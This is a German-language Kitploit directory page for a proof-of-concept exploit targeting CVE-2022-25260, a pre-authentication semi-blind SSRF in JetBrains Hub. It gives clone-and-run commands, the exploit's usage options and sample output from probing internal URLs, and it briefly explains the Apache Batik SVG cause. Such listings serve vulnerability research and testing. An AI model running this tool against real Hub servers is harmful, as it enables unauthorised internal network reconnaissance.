Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-25260 — PoC für CVE-2022-25260: Pre-Auth-Semi-Blind-SSRF in JetBrains Hub | Kitploit
Tools/GitHubGitHub/yuriisanin/cve-2022-25260
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffung
GitHubyuriisanin/cve-2022-25260

CVE-2022-25260

PoC für CVE-2022-25260: Pre-Auth-Semi-Blind-SSRF in JetBrains Hub

Repository anzeigen
43vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-25260

JetBrains Hub Pre-Auth Semi-Blind Server-Side Request Forgery (SSRF)

Voraussetzungen

  • JetBrains Hub <2021.1.14276
  • JetBrains Hub vor 2021.1.14276 war anfällig für eine fehlerhafte Zugriffskontrolle (CVE-2022-34894), die es einem Angreifer ermöglicht, nicht vertrauenswürdige Dienste ohne Authentifizierung zu erstellen, selbst wenn der Gastbenutzer deaktiviert ist. Dadurch ist es möglich, die Schwachstelle ohne weitere Anforderungen auszunutzen (normalerweise sollte ein Angreifer zumindest authentifiziert sein).

Verwendung

Installieren und ausführen:

root@kitploit:~
$ git clone https://github.com/yuriisanin/CVE-2022-25260
$ cd CVE-2022-25260/
$ python3 exploit.py -h

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
usage: exploit.py [-h] -hub_url HUB_URL -email EMAIL [-internal_urls_file INTERNAL_URLS_FILE] [-internal_url INTERNAL_URL]

optional arguments:
  -h, --help            show this help message and exit
  -hub_url HUB_URL      Target Hub instance
  -email EMAIL          Email address of any user in the system
  -internal_urls_file INTERNAL_URLS_FILE
                        Path to internal service URLs file
  -internal_url INTERNAL_URL
                        Internal service URL
  

Verwendung:

root@kitploit:~
$ python3 exploit.py hub_url http://localhost:8080 -email [email protected] -internal_urls_file ./assets/payloads/urls.txt

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
[INFO] - staring scanning for 14 urls.
[INFO] - trying to create Hub service.
[INFO] - Hub service create, serviceId: '02cc6043-1469-4a8e-9a74-b003e721620c'.
[INFO] - trying to request: 'http://127.0.0.1:8080'.
[INFO] - OK. Host 'http://127.0.0.1:8080' is running HTTP service (XML-like response) [FOUND]. Message: 'Attribute name "ng-strict-di" associated with an element type "html" must be followed by the ' = ' character.'.
[INFO] - trying to request: 'http://127.0.0.1:8081'.
[INFO] - OK. Host 'http://127.0.0.1:8081' is DOWN.
[INFO] - trying to request: 'http://google.com'.
[INFO] - OK. Host 'http://google.com' is running HTTP service (presumably XML-like response) [FOUND]. Message: 'The markup in the document preceding the root element must be well-formed.'.

DEMO:

CVE-2022-24342 Demo

Wie funktioniert es?

Die Schwachstelle war möglich aufgrund der Verwendung von Apache Batik mit Standardeinstellungen für die Rasterung von benutzerbereitgestellten SVG-Icons. Weitere Informationen zur Ausnutzung der serverseitigen SVG-Rasterung finden Sie HIER.

Unterstützung

Du kannst mir auf Twitter, GitHub oder YouTube folgen.

Tool herunterladen